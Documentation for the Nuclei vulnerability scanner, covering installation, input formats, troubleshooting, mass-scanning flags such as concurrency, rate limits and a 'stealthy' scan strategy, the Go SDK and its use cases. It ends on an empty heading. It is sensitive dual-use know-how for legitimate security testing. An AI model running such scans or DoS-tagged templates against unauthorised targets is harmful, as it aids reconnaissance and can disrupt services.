Nuclei is a powerful open-source vulnerability scanner that is fast and customizable. It uses simple templates (YAML-based) that describe how to detect, prioritize, and remediate security vulnerabilities for the Nuclei scanning engine.
Nuclei has two components. The [Nuclei engine](http://github.com/projectdiscovery/nuclei) is the core of the project; it allows scripting HTTP / DNS / Network / Headless / File protocol-based checks in a very simple to read-and-write YAML format.
The Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) are custom-created or ready-to-use **community-contributed** vulnerability templates.
Nuclei was created to solve many of the limitations of traditional scanners, which always lacked the features to allow easy-to-write custom checks on top of their engine.
Nuclei was built with a focus on simplicity, modularity, and the ability to scale scanning for many assets.
Ultimately, we wanted to create something simple enough to be used by everyone with the complexity to integrate well with the intricacies of the modern technical stack.
Nuclei's features are implemented and tailored to allow rapid prototyping for complex security checks.
Nuclei is actively maintained and supported by ProjectDiscovery. In general, we release every two weeks and continue to refine, update, and expand Nuclei and its associated capabilities.
Our team also actively monitors for announcements about new CVEs, exploits, and other vulnerabilities to quickly provide a response to address those issues.
We recently released Nuclei v3, [read more about that release on our blog.](https://blog.projectdiscovery.io/nuclei-v3-featurefusion/)
Nuclei is open-source! The best way to support Nuclei is to contribute new templates.
In addition, we are always interested in hearing about how our community uses Nuclei to solve unique security problems and would love to discuss more.
If you want to share the process of a solution you found in walk-through on our blog, we are happy to publish your guest post on the [ProjectDiscovery blog](https://blog.projectdiscovery.io).
Review more details about the project [through GitHub](https://github.com/projectdiscovery/nuclei-templates) or [reach out to us on Discord.](https://discord.com/servers/projectdiscovery-community-695645237418131507)
## Usage
Question and answers about using Nuclei.
Nuclei can be installed with several different options, including Go, Brew, and Docker. Check out [the Nuclei install page](/tools/nuclei/install) for details on all of the options.
Nuclei supports the following types of modules:
* [HTTP](/templates/protocols/http/)
* [DNS](/templates/protocols/dns/)
* [TCP](/templates/protocols/network/)
* [HEADLESS](/templates/protocols/headless/)
* [JAVASCRIPT](/templates/protocols/javascript/)
* [CODE](/templates/protocols/code/)
* [FILE](/templates/protocols/file/)
Nuclei can detect security vulnerabilities in **Web Applications**, **Networks**, **DNS** based misconfiguration, and **Secrets scanning** in source code or in files on the local file system.
In addition, you can now connect your Nuclei setup to ProjectDiscovery Cloud Platform (PDCP) to view your scans. [Check out more information](/cloud/introduction) on PDCP Free and our upcoming Teams release.
To learn more about Nuclei templates, check out [the GitHub repository](https://github.com/projectdiscovery/nuclei-templates), or [explore additional documentation here](/templates/introduction).
After detecting a security issue, **we always recommend that you validate it a second time** before reporting it.
**To validate:**
If you have both a vulnerable target and template, rerun the template with the `-debug` flag to inspect the output against the expected matcher defined in the template. Use this to confirm the identified vulnerability.
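For example, a hedged sketch (the template path and target are placeholders):
```sh
# Re-run a single template with -debug to inspect the raw requests and
# responses against the template's matchers.
nuclei -u https://vulnerable.example.com -t path/to/template.yaml -debug
```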
Once you confirm the result, report it!
By default, Nuclei will make several thousand requests (both HTTP protocol and other services) against a single target when running **all nuclei-templates**.
This is the result of running over 3500 templates (*with an active and growing template library*).
By default, [the following templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore) are excluded from default scans.
We consider two factors for “safety” within the context of Nuclei.
* The traffic Nuclei creates against the target
* The impact templates have on the target
**Traffic**
Nuclei usually makes fewer HTTP requests than the number of templates selected for a scan due to its intelligent request reduction.
While some templates contain multiple requests, this rule holds true across most scan configurations.
**Templates**
The library of Nuclei templates houses a variety of templates which perform fuzzing and other actions which may result in a DoS against the target system ([see the list here](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore)).
To ensure these templates are not run accidentally, they are tagged and excluded from the default scan. These templates can only be executed when explicitly invoked using the `-itags` option, as shown below.
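For instance, a sketch that deliberately opts in to such templates (the tag names are illustrative):
```sh
# Explicitly include templates carrying default-excluded tags.
nuclei -l targets.txt -itags fuzz,dos
```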
Nuclei is an open-source project distributed under the [MIT License](https://github.com/projectdiscovery/nuclei/blob/master/LICENSE.md).
Please join our [Discord server](https://discord.gg/projectdiscovery), or contact us via [Twitter](http://twitter.com/pdnuclei).
## Troubleshooting
Questions and answers about troubleshooting scenarios for Nuclei.
Nuclei uses templates to scan for potential vulnerabilities. These templates are files that contain information on identifying certain types of vulnerabilities.
Think of the templates as a building blueprint. On its own a blueprint cannot cause harm, as it only describes how a building or construct (in this example, a vulnerability) can be built or identified.
**For example:**
* `Webshell.Generic.118` is a template to check for the vulnerability CVE-2017-12615, which is a specific vulnerability in some versions of Apache Tomcat.
* `Backdoor.Generic.LinuxTsunami` is a template that can identify the infamous Linux Tsunami backdoor if it were present on a system.
* `kingdee-erp-rce.yaml` is a template designed to identify a remote code execution vulnerability in Kingdee ERP software.
These files are being flagged as **malware** by anti-malware solutions because they contain patterns that match known vulnerabilities.
It's similar to a textbook on viruses being detected as an actual virus.
Remember, these templates can't "harm" your computer, they are not executing any malicious code on your system.
However, if used as part of a vulnerability scanning process against an insecure system, they could help identify weaknesses.
Headless mode on Linux-based machines (OS or containers, e.g. Docker) might face runtime errors due to missing dependencies related to specific OS shared libraries used by the Chrome binary.
Usually, these errors can be fixed by pre-installing the browser on the specific distribution. Here is a list of the steps needed for the most common distributions.
Ubuntu
With snap:
```sh
sudo snap install chromium
```
Without snap:
```sh
sudo apt update
sudo snap refresh
sudo apt install zip curl wget git
sudo snap install golang --classic
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
sudo apt update
sudo apt install google-chrome-stable
```
In case you are unable to install the browser, or want to install only the minimum required dependencies, run the following command:
```
sudo apt-get install libnss3 libgconf-2-4
```
If you encounter an error similar to "libnss3.so: cannot open shared object file: No such file or directory," try running the following command to install the dev version:
```
sudo apt-get install libnss3-dev
```
Error type examples:
```
Error: Expected nil, but got: &errors.errorString{s:"[launcher] Failed to launch the browser, the doc might help https://go-rod.github.io/#/compatibility?id=os: /root/.cache/rod/browser/chromium-1018003/chrome-linux/chrome: error while loading shared libraries: libnss3.so: cannot open shared object file: No such file or directory\n"}
```
```
could not create browser
```
```
Command '/usr/bin/chromium-browser' requires the chromium snap to be installed.
Please install it with:
snap install chromium
```
## Other FAQs
Check out the [Nuclei Template FAQ](/templates/faq) for more questions and answers about templates.
# Supported Input Formats
Learn about supported input formats in Nuclei and how to use them
Input Formats supported by Nuclei can be grouped into two categories:
* **List Type**: Input formats that can be specified as a list of items (ex: URLs, IPs, CIDRs, ASNs, etc.)
* **HTTP Request Type**: Input formats that contain a complete HTTP request and cannot be expressed as a list of items (ex: OpenAPI Schema, Proxify Traffic Logs, etc.)
### List Type
List type formats can be specified in the following ways:
1. **`-u` flag**:
Comma Separated list of values (ex: `-u scanme.sh,127.0.0.1,AS1337,192.168.1.0/24`)
2. **`-l` flag**:
File containing list of values (ex: `-l urls.txt`)
3. **via stdin (or pipe)**:
List of values can be passed via stdin (ex: `cat urls.txt | nuclei`) or piped from other tools (ex: `mytool | nuclei`)
The following are the list type formats supported by Nuclei:
* **URLs**: A URL, for example `https://projectdiscovery.io`
* **IPs**: IPv4 or IPv6 address, for example `127.0.0.1` or `2001:0db8:85a3:0000:0000:8a2e:0370:7334`
* **CIDRs**: CIDR range, for example `192.168.1.0/24`
* **ASNs**: Autonomous System Number, for example `AS1337`
* **Domains**: Domain or Subdomain name, for example `projectdiscovery.io`
### HTTP Request Type
Due to the nature of these formats, they can only be specified via a file using the `-l` flag, and the format of the file needs to be passed via the `-input-mode` flag:
```
nuclei -l [format-file] -input-mode [format]
```
These formats can be classified into two types based on their usage:
* **API Specification**:
Companies/developers write API specifications for their **RESTful APIs** in various formats, with the standard being **OpenAPI**. These specifications are used for multiple purposes like documentation, testing, code generation, etc.
As of **v3.2.0**, Nuclei uses these specifications to generate HTTP requests and test them against the target.
Nuclei supports **OpenAPI** and **Swagger** specifications, but other formats like Postman can be converted to OpenAPI format and used with Nuclei.
For example, using **OpenAPI** schema in nuclei is as simple as:
```
nuclei -l openapi.yaml -im openapi
```
Nuclei also performs extra validations when generating requests, and accepts inputs and variables while doing so. Refer to [openapi-validations](#openapi-validation) for more details.
* **Request-Response Logs generated by applications**
Many applications generate logs of requests and responses for debugging and monitoring purposes. These logs can be used by Nuclei to find vulnerabilities in the application.
Nuclei supports many popular formats:
* **Burp Suite Saved Items**: You can export request/response items from Burp Suite in XML format and use them with Nuclei.
* **Proxify Traffic Logs**: [Proxify](https://github.com/projectdiscovery/proxify) by ProjectDiscovery exports logs in **JSONL** or **YAML-MultiDoc** format which are supported by nuclei.
**Others**:
The output of any application that either exports logs, or can be converted to logs, in Proxify's `JSONL` or `YAML-MultiDoc` specification can be used with Nuclei.
This means the output of tools like [Katana](/tools/katana/), [Httpx](/tools/httpx/), etc. can be used with Nuclei.
If you want to add support for a new format, please create a Pull Request to [nuclei](https://github.com/projectdiscovery/nuclei).
### OpenAPI Validation
When generating requests from an OpenAPI schema, Nuclei performs validations to ensure that the generated requests are valid and prompts for missing inputs and variables.
```bash
nuclei -h target-format
Nuclei is a fast, template based vulnerability scanner focusing
on extensive configurability, massive extensibility and ease of use.
Usage:
nuclei [flags]
Flags:
TARGET-FORMAT:
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
-ro, -required-only use only required fields in input format when generating requests
-sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file
```
* **`-ro` flag**:
Parameters defined in an OpenAPI schema can be optional or required. When the `-ro` flag is used, Nuclei will only use required parameters and ignore optional ones.
* **`-sfv` flag**:
When the `-sfv` flag is used, Nuclei will skip any and all requests that have missing parameters.
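A hedged sketch combining both flags:
```sh
# Generate requests using only required parameters and skip any
# requests that still have missing values.
nuclei -l openapi.yaml -im openapi -ro -sfv
```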
**Default Behavior**:
* **Missing Auth**:
If a given OpenAPI schema requires authentication, Nuclei will exit with an error listing the missing parameters required for auth. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[FTL] openapi: missing global auth parameter: X-API-Key
```
These missing parameters can be passed using the `-vars` flag. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -vars "X-API-Key=123"
```
* **Missing Required Variables**:
By default, when Nuclei finds a request with optional parameters, it uses them if values are available or skips those parameters. For missing required parameters, Nuclei will halt with an error. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -V "X-API-Key=23"
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[ERR] openapi: Found 3 missing parameters, use -skip-format-validation flag to skip requests or update missing parameters generated in required_openapi_params.yaml file,you can also specify these vars using -var flag in (key=value) format
```
If the same command is run with the `-v` flag (verbose mode), Nuclei will also log skipped optional parameters. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -V "X-API-Key=23"
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[VER] openapi: skipping optional param (scan_ids) in (query) in request [GET] /results/filters due to missing value (scan_ids)
[VER] openapi: skipping optional param (severity) in (query) in request [GET] /results/filters due to missing value (severity)
...
[VER] openapi: skipping optional param (template) in (query) in request [GET] /results/filters due to missing value (template)
[VER] openapi: skipping optional param (host) in (query) in request [GET] /results/filters due to missing value (host)
[ERR] openapi: Found 3 missing parameters, use -skip-format-validation flag to skip requests or update missing parameters generated in required_openapi_params.yaml file,you can also specify these vars using -var flag in (key=value) format
```
These missing parameters can be passed using the `-vars` flag or by **temporarily** specifying them in the auto-generated `required_openapi_params.yaml` file.
This file is generated in the current working directory when Nuclei halts due to missing parameters. Here's an example auto-generated `required_openapi_params.yaml` file:
```yaml
var:
- user_id=
- id=
- ip=
# Optional parameters
# - host=
# - name=
# - not_host=
# - not_severity=
# - not_template=
# - scan_ids=
# - search=
# - severity=
# - template=
# - vuln_status=
```
You can specify these missing parameters in the `required_openapi_params.yaml` file and they will be automatically picked up by Nuclei. If you prefer to specify these missing parameters using the `-vars` flag, you can do so as well.
The auto-generated `required_openapi_params.yaml` file is meant for temporary use, and it will be **deprecated** in the next release as we move towards our goal of **ProjectDiscovery Standard Authentication Across Tools** using the `secret` file.
* **Placeholder Parameter Values**
When Nuclei finds any request that has optional parameters and the `-ro` flag is not used, it will use placeholder values depending on the data type of the parameter. For example:
If a parameter is of type `string`, it will use `string` as the placeholder value; the same goes for other known types, including timestamps.
# Installing Nuclei
Learn about how to install and get started with Nuclei
```bash
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
```
Nuclei requires the latest **Go** version to install successfully.
```bash
brew install nuclei
```
Supported on **macOS** (and Linux)
```bash
docker pull projectdiscovery/nuclei:latest
```
Docker-specific usage instructions can be found [here](./running#running-with-docker).
```bash
git clone https://github.com/projectdiscovery/nuclei.git; \
cd nuclei/cmd/nuclei; \
go build; \
mv nuclei /usr/local/bin/; \
nuclei -version;
```
Nuclei requires the latest **Go** version to install successfully.
```bash
https://github.com/projectdiscovery/nuclei/releases
```
* Download the latest binary for your OS.
* Unzip the ready-to-run binary.
```bash
git clone https://github.com/projectdiscovery/nuclei.git
cd nuclei/helm
helm upgrade --install nuclei . -f values.yaml
```
This Helm chart creates two primary resources (intended to be configured via `values.yaml`):
* A Kubernetes CronJob to run Nuclei on a defined schedule
* An [Interactsh](https://github.com/projectdiscovery/interactsh) service for Nuclei to use
# Mass Scanning with Nuclei
Running Nuclei through the CLI on hundreds of targets
## What is **Mass Scanning?**
Mass scanning in the context of Nuclei means running the Nuclei CLI on more than 100 targets. While Nuclei works out of the box for running scans on any number of targets, we recommend learning
the resource requirements for running Nuclei in different scenarios, and how to properly adjust flags and options to avoid overutilization of resources and get the best performance.
## Overutilization of Resources
If flags and available options are not properly configured, Nuclei can overutilize resources and cause the following issues:
* Getting OOM-killed by the system
* Hangs and crashes
* Exit code 137, etc.
## Understanding How Nuclei Consumes Resources
Nuclei is a highly concurrent tool that performs heavy network I/O by nature. There is a direct correlation between concurrency and memory usage.
**max-requests**
`max-requests` is a metadata field under the info section of a template that contains the maximum number of outgoing requests that template can make.
**Below are some flags and options that directly affect the resource utilization of Nuclei:**
* **-c or -concurrency**
This flag controls the concurrency/parallelism of two components/operations in Nuclei, and its default value is 25.
1. The number of templates to run in parallel at a time (in Template-Spray/default mode/strategy), or the number of templates to run in parallel per target (in Host-Spray mode/strategy)
2. The number of requests to send in parallel per template
For example, some templates have a `payloads` field and usually send multiple requests. This per-template concurrency is controlled by the `threads: 10` value in the template,
but if `threads` is not defined (it is optional), then Nuclei will use the `-c` value to decide the request concurrency per template.
* **-bs or -bulk-size**
This flag controls the concurrency/parallelism of targets in Nuclei, and its default value is 25.
In Host-Spray mode/strategy, this flag controls the maximum number of targets to run in parallel at a time.
In Template-Spray/default mode/strategy, this flag controls the maximum number of targets to run in parallel for each template.
* **-hbs and -headc**
The `-hbs` (-headless-bulk-size) and `-headc` (-headless-concurrency) flags are variants of the `-bs` and `-c` flags specifically for headless templates, since headless templates are resource intensive and run a headless browser in the background.
* **-jsc or -js-concurrency**
(Introduced in v3.1.8) This flag controls the maximum number of JavaScript runtimes to run in parallel at a time. JavaScript runtimes are used in templates with the `flow` field and the JavaScript protocol.
Although JavaScript templates are few compared to HTTP templates, this provides a way to control their resource utilization.
The default value of this flag is 120, which has been tested to be optimal with minimal resource utilization. (Note: Nuclei by default reuses JavaScript runtimes to avoid the overhead of creating a new runtime for each request.)
* **-pc or -payload-concurrency**
(Introduced in v3.2.0) This flag controls the maximum number of payloads to run in parallel for each template. It is only applicable to templates that have a `payloads` field and do not have the `threads` field set; its default value is 25 and can be adjusted as required.
* **-rl or -rate-limit**
This flag controls the global rate limit of HTTP requests in Nuclei, and its default value is 150 requests per second.
Note: Setting a low/very low value for this flag directly affects the speed (RPS) and memory usage of Nuclei, since the rate limit is applied just before sending requests; at that point the requests are already prepared and are in memory waiting to be sent.
* **-rlm or -rate-limit-minute**
An alternative to the `-rl` flag, this flag controls the global rate limit of HTTP requests in Nuclei in terms of requests per minute (not used by default, and mutually exclusive with the `-rl` flag).
* **-ss or -scan-strategy**
This flag controls the strategy for scanning targets, and its default value is `auto`.
1. `auto` is currently a placeholder for the `template-spray` strategy.
2. The `template-spray` strategy can be understood as a stealthy mode of scanning that does not aggressively scan a single target. Instead of running all templates on a single target, it runs a template across multiple targets, thereby reducing the load on each target without compromising scan speed.
3. The `host-spray` strategy can be understood as a more focused mode of scanning, where all templates are run on a single target before moving to the next target.
Although the difference might not seem significant, in practice it plays a major role in resource utilization and scan speed. For example, the `template-spray` strategy is more stealthy but consumes more memory than `host-spray`, since the input/target chunk is different for each template, contrary to the `host-spray` strategy where the input/target chunk is the same for all templates.
This flag only decides the scanning strategy and uses the concurrency specified by the `-c` and `-bs` flags.
**Note**: The `host-spray` strategy currently does not support the resume feature due to implementation complexity.
* **-rsr or -response-size-read**
This flag controls the maximum HTTP response size that Nuclei should read, and its default value is 4MB (max).
For example, if an endpoint/target returns a 100MB response (a zip file or similar), Nuclei will only read the first 4MB to avoid a DoS, since the data read is stored in memory.
This plays a major role in Nuclei's memory usage, because at any moment the heap memory of Nuclei is roughly `1-1.5 * (concurrency * response-size-read)`. For example, with a concurrency of 25 and the default 4MB read limit, response buffers alone can account for roughly 100-150MB of heap.
* **-stream**
Instead of probing all input URLs and then proceeding with the scan (the default behavior), this flag continuously streams inputs to Nuclei instead of waiting for probing to finish.
It has been observed that this flag may lead to high memory usage when running with the `template-spray` strategy, since a marshal/unmarshal overhead is involved and each template has a different copy of the input/target chunk.
## Recommendations for Optimizing Resource Usage
Currently, there is no out-of-the-box solution to optimize Nuclei automatically for mass scanning. Understanding the proper use of flags and options can help in optimizing Nuclei for mass scanning.
In general, here are some recommendations to optimize Nuclei for mass scanning:
* Prefer the `host-spray` strategy when possible
* Do not constrain GC (garbage collection) by setting low memory limits if possible. Nuclei (just like the Go standard HTTP library) focuses on reusing memory rather than freeing it and allocating it again. This is why Nuclei, like other Go tools, does not show high fluctuation in memory usage and instead increases or decreases memory usage gradually
* Properly adjust the `-c`, `-bs` and `-rl` flags after understanding the requirements and capabilities of your own system as well as the targets you are scanning (see the sketch after this list)
* Although Nuclei can handle any number of targets, we recommend batching targets based on target or system capabilities
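A sketch putting these recommendations together (the values are illustrative and should be tuned to your system and targets):
```sh
# host-spray strategy with moderate concurrency and a conservative
# global rate limit.
nuclei -l targets.txt -ss host-spray -c 25 -bs 50 -rl 100
```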
## Feature-based Optimizations for Mass Scanning
* **-timeout**
Timeout controls the maximum time Nuclei should wait for a response (the current default is 10 seconds for HTTP, and 6 \* the -timeout value for the code protocol).
The right value depends on your targets and network conditions: setting a low value might cause false negatives, while setting a high value might cause high memory usage and slow down the scanning process.
* **-retries**
Retries controls the maximum number of retries Nuclei should attempt for a request (the current default is 1).
This flag is useful when you are scanning targets with unstable network conditions. Setting a high value might cause high memory usage and slow down the scanning process.
* **-mhe or -max-host-error**
This flag controls the maximum number of (network-type) errors to allow per host before removing the unresponsive host from the scan (the current default is 30).
* **-nmhe or -no-max-host-error**
This flag disables removing unresponsive hosts from the scan when they reach the maximum number of errors.
Note: This flag directly affects the speed and memory usage of Nuclei, since it keeps unresponsive hosts in memory and retries them.
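A sketch combining these flags for slow or flaky targets (the values are illustrative):
```sh
# Shorter timeout, a single retry, and a larger per-host error budget.
nuclei -l targets.txt -timeout 5 -retries 1 -mhe 50
```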
## Reporting Performance Issues
Unlike other types of issues, performance issues require more, and different, information to debug and fix. Hence, it is recommended to report performance issues with the following information:
* Nuclei Version (if not latest then try with latest version)
* System Information (OS, Memory, CPU)
* Target Count and Template Count
* The values of the flags mentioned above, especially `-c`, `-bs`, `-rl`, and `-ss`
* Any other flags and options used
The above information will help determine whether the issue is due to misconfiguration or a bug in Nuclei. If the issue is of a more complex nature, like a memory leak, then application profiles need to be collected and shared in the issue description.
Profiling can be enabled in Nuclei using the `PPROF=1` environment variable, which also accepts the additional option `PPROF_TIME=10s`. Using these two env variables enables profiling, and snapshots of the CPU and memory profiles are collected and stored in the appropriate directories every 10 seconds (`PPROF_TIME`). For additional options about profiling, refer to [nuclei-pprof](https://github.com/projectdiscovery/utils/tree/main/pprof).
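For example, enabling profiling for a scan as described above:
```sh
# Collect CPU and memory profile snapshots every 10 seconds while scanning.
PPROF=1 PPROF_TIME=10s nuclei -l targets.txt
```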
A good example of reporting a performance issue like a memory leak is [#4552](https://github.com/projectdiscovery/nuclei/issues/4552).
## Maximize Your Nuclei Experience with PDCP
Building a Nuclei automation or running recurrent scans on more than 100 targets can be a challenging task without understanding Nuclei and experimenting with the flags and options.
One additional option is to consider evaluating ProjectDiscovery Cloud Platform or [PDCP](https://cloud.projectdiscovery.io). As a managed service it offers:
* All scaling and optimization is abstracted away
* Scans are distributed and requests are appropriately chunked to scale without false negatives
PDCP includes many other helpful features for vulnerability scanning and ASM, like dashboards, integrations, reporting, recurring scans, and much more.
For more information on PDCP, visit [PDCP](https://docs.projectdiscovery.io/cloud/introduction).
# Nuclei SDK
Learn more about using the Nuclei SDK
## Nuclei SDK
Nuclei is primarily built as a CLI tool and typically optimizations and options are focused on improvements to the CLI. To address the increased usage of Nuclei from Go, we have introduced a revamped Go SDK of Nuclei in [v3.0.0](https://blog.projectdiscovery.io/nuclei-v3-featurefusion/#sdk-4-all-revamped-go-sdk).
While the CLI is still the primary way to use Nuclei, additional documentation and an API reference along with examples are available at [pkg.go.dev](https://pkg.go.dev/github.com/projectdiscovery/nuclei/v3@v3.1.10/lib#section-readme).
> **Things to Note**:
>
> * Nuclei is still in active development, so breaking changes can be expected in the SDK. The team will continue to maintain the documentation to address changes as they are implemented.
> * Running Nuclei as a service may pose security risks. We recommended implementing Nuclei as a service with caution and additional security measures suited to your environment.
If you have questions, reach out to us through [Help](/help).
### Nuclei Version
Nuclei does not support an LTS version or a stable version. This is because Nuclei and templates function as a single unit and the Nuclei Engine will evolve to meet requirements and features to support writing new templates.
To ensure the best results we recommend keeping up to date with the latest version of the Nuclei SDK.
## Performance and Optimization
Optimal and resource efficient usage of the Nuclei SDK requires a thorough understanding of [How Nuclei Consumes Resources](/tools/nuclei/mass-scanning-cli#understanding-how-nuclei-consumes-resources). We also recommend understanding optimization based on multiple factors. Refer to [mass-scanning](/tools/nuclei/mass-scanning-cli) for more details on scanning for larger target quantities.
### General Suggestions for Usage
* Implement a `host-spray` strategy when possible
* Do not constrain GC (garbage collection) by setting low memory limits if possible. Nuclei (just like the Go standard HTTP library) focuses on reusing memory rather than freeing it and allocating it again. This is why Nuclei, like other Go tools, does not show high fluctuation in memory usage and instead increases or decreases memory usage gradually
* Properly adjust the `-c`, `-bs`, and `-rl` flags after understanding the requirements and capabilities of your own system as well as the targets you are scanning
* While Nuclei can handle any target quantity with the correct configuration, we recommend batching targets (based on target/system capabilities)
* Using Nuclei from the SDK provides more control in terms of customizing what to run and how to run it, and we recommend a proper chunking strategy that takes all factors into account
* Since the SDK is still in active development, we recommend reviewing Nuclei's capabilities, especially the `tmplexec` and `core` packages. Understanding the execution flow will give you more granular insights into how to optimize Nuclei for your use case
### Reporting Issues
After understanding all the factors and optimization techniques mentioned in the documentation linked above, if you are still facing performance issues such as crashes or memory leaks, please report the issue with the details below:
* Nuclei version (if not the latest, please try with the latest version before reporting)
* Target/Input Count
* Template Count
* Values of all flags mentioned in [mass-scanning](/tools/nuclei/mass-scanning-cli) documentation or actual code snippet containing the same
* Observed Memory Usage
* Type of Handler used (NucleiEngine or ThreadSafeNucleiEngine)
* Any other relevant details
For memory leak issues, debug profiles using [pprof](https://go.dev/blog/pprof) are required to properly diagnose the issue.
# Nuclei Overview
A fast and customisable vulnerability scanner powered by simple YAML-based templates
## What is **Nuclei?**
Nuclei is a fast vulnerability scanner designed to probe modern applications, infrastructure, cloud platforms, and networks, aiding in the identification and mitigation of exploitable vulnerabilities.
At its core, Nuclei uses templates, expressed as straightforward YAML files, that describe methods for detecting, ranking, and addressing specific security flaws.
Each template delineates a possible attack route, detailing the vulnerability, its severity, priority rating, and occasionally associated exploits. This template-centric methodology ensures Nuclei not only identifies potential threats, but pinpoints exploitable vulnerabilities with tangible real-world implications.
New to scanners and Nuclei? Try it out today with a quick example through our [Getting Started](/getstarted-overview).
## What are Nuclei's features?
| Feature | Description |
| ----------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| [Extensive Template Library](#) | Nuclei offers a vast collection of community-powered templates for targeted scans of various vulnerabilities and attack vectors. |
| [Versatile Target Specification](#) | Support for various target specification options, such as URLs, IP ranges, ASN range, and file input, allowing flexibility in defining the scanning scope. |
| [Bulk Scanning](#) | Perform bulk scanning by specifying multiple targets at once, enabling efficient scanning of a large number of assets or websites. |
| [Flexible Customization](#) | Customize scanning templates to fit specific needs, allowing tailored scanning and focusing on relevant security checks. |
| [Parallel Scanning](#) | Supports parallel scanning, reducing scanning time and improving efficiency, especially for large-scale targets. |
| [Comprehensive Reporting `cloud`](#) | Generates detailed reports with actionable insights, including vulnerability details, severity levels, affected endpoints, and suggested remediation steps. |
| [Integration with CI/CD Pipelines](#) | Seamlessly integrate Nuclei into CI/CD pipelines for automated security testing as part of the development and deployment process. |
| [Active Maintenance `cloud`](#) | Actively maintained and developed by the ProjectDiscovery team, introducing new features, bug fixes, and enhancements to provide an up-to-date scanning framework. |
| [Ticketing integration `cloud`](#) | Two-way ticketing integration with Jira, Splunk, and many others to easily remediate and retest vulnerabilities. |
| [Customizable Output Format](#) | Configure the output format of Nuclei's scan results to suit your needs, including options for JSON, YAML, and more. |
| [Dynamic Variables](#) | Utilize dynamic variables in templates to perform parameterized scanning, enabling versatile and flexible scanning configurations. |
| [Inclusion and Exclusion Filters](#) | Apply inclusion and exclusion filters to specify targets, reducing scanning scope and focusing on specific areas of interest. |
| [Authentication Support](/tools/nuclei/authenticated-scans) | Nuclei supports various authentication mechanisms, including HTTP basic authentication, JWT token authentication, and more. |
| [Embedding custom code in templates](#) | Execute custom code within Nuclei templates to incorporate user-defined logic, perform advanced scanning actions, and more. |
## How can I use Nuclei?
The global security community, including numerous researchers and engineers, actively contributes to the Nuclei template ecosystem. With over 6500 templates contributed thus far, Nuclei is continuously updated with real-world exploits and cutting-edge attack vectors.
Nuclei templates support scanning for critical issues such as the Log4j vulnerability and RCEs that impact vendors such as GitLab, Cisco, F5, and many others. Nuclei has dozens of use cases, including:
| Use Case | Description |
| ------------------------------------------ | --------------------------------------------------------------------------------------------- |
| Web Application Security | Identifies common web vulnerabilities with community-powered templates. |
| Infrastructure Security | Audits server configurations, open ports, and insecure services for security issues. |
| API Security Testing `alpha` | Tests APIs against known vulnerabilities and misconfigurations. |
| (CI/CD) Security | Integrates into CI/CD pipelines to minimize vulnerability resurface into production. |
| Third-party Vendor Assessment | Evaluates the security of third-party vendors by scanning their digital assets. |
| Cloud Security `alpha` | Scans cloud environments for misconfigurations and vulnerabilities. |
| Mobile Application Security | Scans mobile applications for security issues, including API tests and configuration checks. |
| Network Device Security `alpha` | Identifies vulnerabilities in network devices like routers, switches, and firewalls. |
| Web Server Assessment | Identifies common vulnerabilities and misconfigurations in web servers. |
| Content Management System (CMS) Assessment | Identifies vulnerabilities specific to CMS platforms like WordPress, Joomla, or Drupal. |
| Database Security Assessment | Scans databases for known vulnerabilities, default configurations, and access control issues. |
## Who is Nuclei for?
People use Nuclei in a variety of ways:
* **Security Engineers/Analysts**: Conduct security assessments, proactively identify vulnerabilities, convert custom vectors, and analyze the latest attack vectors.
* **Red Teams**: Leverage Nuclei as part of their offensive security operations to simulate real-world attack scenarios, identify weaknesses, and provide actionable recommendations for enhancing overall security.
* **DevOps Teams**: Integrate Nuclei into their CI/CD pipelines to ensure continuous security and regression of custom vulnerabilities.
* **Bug Bounty Hunters**: Leverage Nuclei to find vulnerabilities across their programs listed on platforms like HackerOne, Bugcrowd, Intigriti etc.
* **Penetration Testers**: Utilize Nuclei to automate their assessment methodologies into templates for their clients' systems.
### Security Engineers
Nuclei offers a number of features that help security engineers customise workflows in their organization. With its variety of scan capabilities (such as DNS, HTTP, and TCP), security engineers can easily create a suite of custom checks with Nuclei.
* Protocol support including TCP, DNS, HTTP, file, and more
* Achieve complex vulnerability steps with workflows and [dynamic requests.](https://blog.projectdiscovery.io/nuclei-unleashed-quickly-write-complex-exploits/)
* Easy CI/CD integration, designed to slot into regression cycles to actively verify fixes and catch the re-appearance of vulnerabilities.
### Developers and Organizations
Nuclei is built with simplicity in mind. With templates backed by hundreds of community members, it allows you to stay on top of the latest security threats through continuous Nuclei scanning of your hosts.
It is designed to be easily integrated into regression test cycles to verify fixes and prevent vulnerabilities from reappearing.
* **CI/CD:** Engineers already use Nuclei within their CI/CD pipelines, allowing them to constantly monitor their staging and production environments with customised templates.
* **Continuous Regression Cycle:** With Nuclei, you can create a custom template for every newly identified vulnerability and feed it to the Nuclei engine to eliminate the issue in the continuous regression cycle.
### Bug Bounty Hunters
Nuclei allows a custom testing approach, supporting your own suite of checks to easily run across your bug bounty programs. In addition, Nuclei can be easily integrated into any continuous scanning workflow.
* Nuclei is easily integrated into other tool workflows
* Can process thousands of hosts in a few minutes
* Easily automates your custom testing approach with our simple YAML DSL
Check our projects and tools to see what might fit into your bug bounty workflow: [github.com/projectdiscovery](http://github.com/projectdiscovery). We also host a daily [refresh of DNS data at Chaos](http://chaos.projectdiscovery.io).
### Penetration Testers
